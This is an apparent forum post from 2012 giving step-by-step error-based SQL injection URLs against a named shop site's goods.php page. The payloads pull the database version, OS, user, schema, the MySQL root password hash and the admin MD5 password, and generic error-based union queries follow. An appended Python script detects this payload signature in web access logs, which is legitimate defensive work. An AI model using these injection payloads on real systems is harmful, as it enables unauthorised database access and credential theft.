
Blind injection details

Posted on 2012-9-5 14:59:30
Determine the version number

http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

Determine the operating system

http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version_compile_os%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

Current user()

http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20user()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

Current database()

http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20database()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

root hash

http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20Password%20from%20mysql.user%20where%20User=char(114,111,111,116)),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

Current database table names

http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20TABLE_NAME%20%20from%20information_schema.tables%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20limit%206,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
Current database: user_name column

http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%202,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
Current database: password column

http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%204,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
Get the admin passwd (md5)

http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20concat_ws(char(94),ifnull(cast(%60password%60%20as%20char),char(32)),ifnull(cast(%60user_name%60%20as%20char),char(32)))%20%20from%20sansan1.ecs_admin_user%20limit%200,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
Error-based injection

SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select version()) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)

SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select username FROM admin_table LIMIT 0,1) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)

and(select 1 from(select count(*),concat((select (select (Select concat(0x7e,0x27,SCHEMA_NAME,0x27,0x7e) FROM information_schema.SCHEMATA LIMIT 21,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
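Every payload in the post has the same skeleton: a subquery that builds a GROUP BY key out of the data to be leaked plus floor(rand()*2), so that the resulting duplicate-key error carries the value back in the error message, and the whole thing arrives URL-encoded in a single GET parameter. From the defender's side that skeleton is exactly what a log-review rule should key on. The script below is an added example, not part of the original post, and not code from any project: it decodes the query string of web-server access-log lines (combined-log shape assumed), normalises whitespace and case, and flags a parameter only when the co-occurring building blocks of the technique are all present, so a single innocuous word such as "group" does not trigger it. The log lines and the client addresses are constructed for the example; the two malicious lines reuse payload shapes that already appear on this page.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote_plus

# Constructed sample access-log lines (documentation IP ranges, hypothetical host).
# Lines 1 and 2 carry the error-based (floor(rand()*2) + GROUP BY) shape shown in the post;
# line 3 is an ordinary request and must not be flagged.
SAMPLE_LOG = """\
203.0.113.5 - - [05/Sep/2012:14:59:30 +0800] "GET /goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23 HTTP/1.1" 500 1203
203.0.113.5 - - [05/Sep/2012:15:01:02 +0800] "GET /goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20Password%20from%20mysql.user%20where%20User=char(114,111,111,116)),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23 HTTP/1.1" 500 1190
198.51.100.7 - - [05/Sep/2012:15:02:10 +0800] "GET /goods.php?id=352&wsid=1 HTTP/1.1" 200 8841
"""

# Pull the request target out of a combined-log line.
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')

# Each tag fires only when ALL of its patterns appear in the decoded parameter value.
# The first tag is the duplicate-key error technique itself; the others are the
# supporting pieces seen in the post (schema enumeration, the mysql.user table,
# and char(...) string building used to avoid quotes).
SIGNATURES = {
    "rand_floor_group_by": [
        r"floor\s*\(\s*rand\s*\(",
        r"group\s+by",
        r"count\s*\(\s*\*\s*\)",
    ],
    "information_schema": [r"information_schema\."],
    "mysql_user_table": [r"mysql\.user"],
    "char_obfuscation": [r"\bchar\s*\(\s*\d+(\s*,\s*\d+)+\s*\)"],
}


def normalise(value):
    """Undo a second layer of URL-encoding, drop inline comments, collapse whitespace, lowercase."""
    v = unquote_plus(unquote_plus(value))
    v = re.sub(r"/\*.*?\*/", " ", v)
    v = re.sub(r"\s+", " ", v)
    return v.lower()


def classify_params(url):
    """Return (parameter, tag) pairs for every signature matched in the URL's query string."""
    parts = urlsplit(url)
    hits = []
    # parse_qsl already decodes one layer; normalise() handles a possible second one.
    for name, raw in parse_qsl(parts.query, keep_blank_values=True):
        decoded = normalise(raw)
        for tag, patterns in SIGNATURES.items():
            if all(re.search(p, decoded) for p in patterns):
                hits.append((name, tag))
    return hits


def analyse_log(text):
    """Scan log text and return one finding per flagged request."""
    findings = []
    for line in text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        hits = classify_params(m.group(1))
        if hits:
            findings.append({
                "source": line.split(" ", 1)[0],
                "url": m.group(1),
                "params": sorted({p for p, _ in hits}),
                "tags": sorted({t for _, t in hits}),
            })
    return findings


if __name__ == "__main__":
    for f in analyse_log(SAMPLE_LOG):
        print(f["source"], f["params"], f["tags"])
```

Two design points matter in practice. The match runs on the decoded, whitespace-collapsed value rather than on the raw log line, because the payloads arrive with every space as %20 and a rule written against the raw text is trivially evaded by encoding. And the primary tag requires the three building blocks together; any one of them alone is common in legitimate traffic, whereas floor(rand( next to GROUP BY and COUNT(*) inside a request parameter has no benign explanation.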